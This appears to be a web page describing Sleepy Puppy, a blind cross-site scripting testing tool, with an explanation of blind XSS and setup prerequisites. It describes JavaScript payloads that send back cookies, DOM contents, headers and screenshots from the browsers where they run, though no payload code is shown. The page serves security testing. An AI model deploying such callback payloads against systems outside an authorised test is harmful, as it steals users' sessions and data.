Sleepy Puppy — Blind Cross-site Scripting Collector and Manager
https://www.ispeech.org/text.to.speech
Sleepy Puppy is a blind cross-site scripting (xss) collector which was created to simplify blind xss testing
Often when testing for client side injections (HTML/JS/etc.) security engineers are looking for where the injection occurs within the application they are testing only. While this provides ample coverage for the application in scope, there is a possibility that the code engineers are injecting may be reflected back in a completely separate application.
[adsense size='1']
Sleepy Puppy helps facilitate inter-application xss testing by providing JavaScript payloads that callback to the Sleepy Puppy application.
How Does Sleepy Puppy Do It?
[adsense size='1']
Sleepy Puppy provides a JavaScript payload that security engineers can use for Blind xss testing. The callback functions provided by the Javascript generate useful capture metadata including the uri, DOM, user-agent, cookies, referer header, and a screenshot where the payload executed. This allows a tester to generate unique JavaScript payloads and trace what applications they execute in throughout the payload lifecycle.
Sleepy Puppy also supports email notifications for captures received for specific assessments.
Sleepy Puppy exposes an API for users who may want to develop plugins for scanners such as Burp or Zap.
Blind XSS vulnerabilities are a variant on stored cross-site scripting vulnerabilities. They occur when the attacker input is saved by the server and displayed in another application with a different origin.
Often when testing for client side injections (HTML/JS/etc.) security engineers are looking for where the injection occurs within the application they are testing only. While this provides ample coverage for the application in scope, there is a possibility that the code engineers are injecting may be reflected back in a completely separate application.
An example would be a signup for an eCommerce website. One can imagine a field such as “First Name” which gets reflected back throughout the eCommerce website. But what about the helpdesk application when a user has a question? We can imagine that first name field may get reflected back out in the helpdesk application. It’s also possible that the help desk user logs into another application to retrieve more information on you when you ask a question. That application may also reflect the “First Name” parameter.
Blind cross-site scripting allows you to test a deeper scope and breadth of the ‘data’ flow within an endpoint.
Prerequisites
- Python2.7
- pip
- git
[adsense size='1']
Grab the repo
git clone https://github.com/sbehrens/sleepy-puppy.git
Gloss